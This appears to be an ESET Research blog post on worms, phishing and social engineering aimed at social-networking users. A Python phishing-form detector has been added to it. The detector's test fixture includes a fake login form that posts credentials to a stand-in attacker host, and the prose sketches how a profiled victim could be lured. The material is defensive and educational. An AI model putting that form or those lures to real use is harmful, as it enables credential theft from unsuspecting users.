In recent months malware on social sites has been in the media. There was the “Greygoo” worm that affected Second Life (http://secondlife.com/), as well as worms attacking MySpace (http://www.myspace.com) users. A recent worm that used QuickTime to spread to MySpace users also incorporated a phishing attack. Users who accessed infected pages were sent to a web page that asked them to sign in to MySpace. If the user entered their name and password, it did not log them in; it stole the information.
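The fake sign-in page described above works because a form that looks like the site's login posts the username and password to a server the attacker controls. One defensive check that catches this pattern is to look at where each password form on a page actually submits to and compare that host with the site the user believes they are signing in to. The code below is an added example, not part of the original post or any ESET tool; the page URL, the sample HTML and the hostnames in it are constructed for the demonstration, and the two-label "registrable host" comparison is a deliberate simplification.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormScanner(HTMLParser):
    """Collect each <form>'s resolved action and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []          # one dict per form: {"action": str, "has_password": bool}
        self._current = None     # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)      # HTMLParser lowercases tag and attribute names, not values
        if tag == "form":
            # A missing/empty action submits back to the page itself; urljoin handles
            # relative actions so we can compare hosts later.
            action = attrs.get("action") or ""
            self._current = {"action": urljoin(self.page_url, action), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _registrable_host(url):
    """Simplified 'site' name: the last two labels of the hostname (assumption, not a PSL lookup)."""
    host = (urlparse(url).hostname or "").lower()
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def find_credential_leaks(page_url, html, expected_site):
    """Return actions of password forms that submit to a site other than expected_site."""
    scanner = _FormScanner(page_url)
    scanner.feed(html)
    return [
        form["action"]
        for form in scanner.forms
        if form["has_password"] and _registrable_host(form["action"]) != expected_site.lower()
    ]


# Constructed sample: a profile page on the legitimate site containing a real login
# form, a look-alike form that posts credentials elsewhere, and a harmless search form.
SAMPLE_PAGE_URL = "http://profiles.example.com/someuser"
SAMPLE_HTML = """
<html><body>
<form action="https://login.example.com/session" method="post">
  <input type="text" name="email"><input type="password" name="password">
</form>
<form action="http://collect.attacker.invalid/login.php" method="post">
  <input type="text" name="email"><input type="PASSWORD" name="pw">
</form>
<form action="/search"><input type="text" name="q"></form>
</body></html>
"""


def demo():
    """Run the check over the constructed sample page."""
    return find_credential_leaks(SAMPLE_PAGE_URL, SAMPLE_HTML, "example.com")


if __name__ == "__main__":
    for action in demo():
        print("password form submits off-site:", action)
```

Only the look-alike form is reported; the genuine login form posts to a host under the expected site and the search form has no password field. A real deployment would replace the two-label host comparison with a public-suffix lookup and would also flag forms whose action is plain `http://`, but the page-level idea is the same: a credential form that leaves the site you think you are on is the phishing page the post describes.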
Community sites are going to continue to flourish so it is important for users to be aware of the risks they face and tactics for protection.
There are the standard security precautions that apply to all computer and internet use, but users of community or social web sites also need to be aware of the social engineering aspects. Social engineering simply means tricking you into doing something.
The biggest danger of these sites is that people tend to drop their guard. There are millions of friendly folks sharing all kinds of information, and people tend to trust that when someone befriends them and tells them about something cool it is just good old-fashioned neighborly friendship. Unfortunately, there are going to be several not-so-nice people in almost any gathering of thousands or millions of people.
The fact that people tend to put up a lot of personal information makes it extremely easy to use social engineering.
Here is an example. I did a search and randomly picked a user. I found out that she is married to a soldier, has a child, is obsessive compulsive, religious, loves to read, likes teaching, and writes children’s books, among other things. Armed with this information it is very easy to convince a person that I am very religious, concerned for the safety of all of our soldiers, and find solace in “www.i’m very mean.com”. Of course, it would be dressed up to look like a perfectly nice web site to visit. Once there, I can execute code on her computer that exploits a zero-day vulnerability, or even convince her to run a program that will “display a quote a day from the bible”. I could probably convince her to sign up for a military support friendship group, and so on. Knowing how people use passwords, it is pretty likely that the password entered is not unique to my “community”, and I can then go about hacking into her other accounts. There are lots of ways to attack.
If I don’t know anything about a person and tell them to check something out, they might be more cautious because they don’t know me and I do not appear to know anything about them.
If you use community sites, I’m not saying not to make friends, but take your time before you accept links to other web sites, or are convinced to download or sign up for anything. The bad guys don’t want to spend hours getting to know you; there are easier targets.
When I went to this specific web page it automatically launched a video! I’m sure glad I run Firefox and IE in SandBoxIE (www.sandboxie.com). If the video had exploited a vulnerability, I could have become infected with all kinds of bad programs that could steal my passwords or other information on my computer.
Virtualization technologies such as SandBoxIE are a great complement to anti-virus solutions. Neither stops everything, but virtualization can protect sensitive data, and if something bad was installed it will be gone when I empty the sandbox.
Surf safe. Remember, the community web sites are a masquerade party. You do not really know who’s behind the mask and their intent.
Author ESET Research, ESET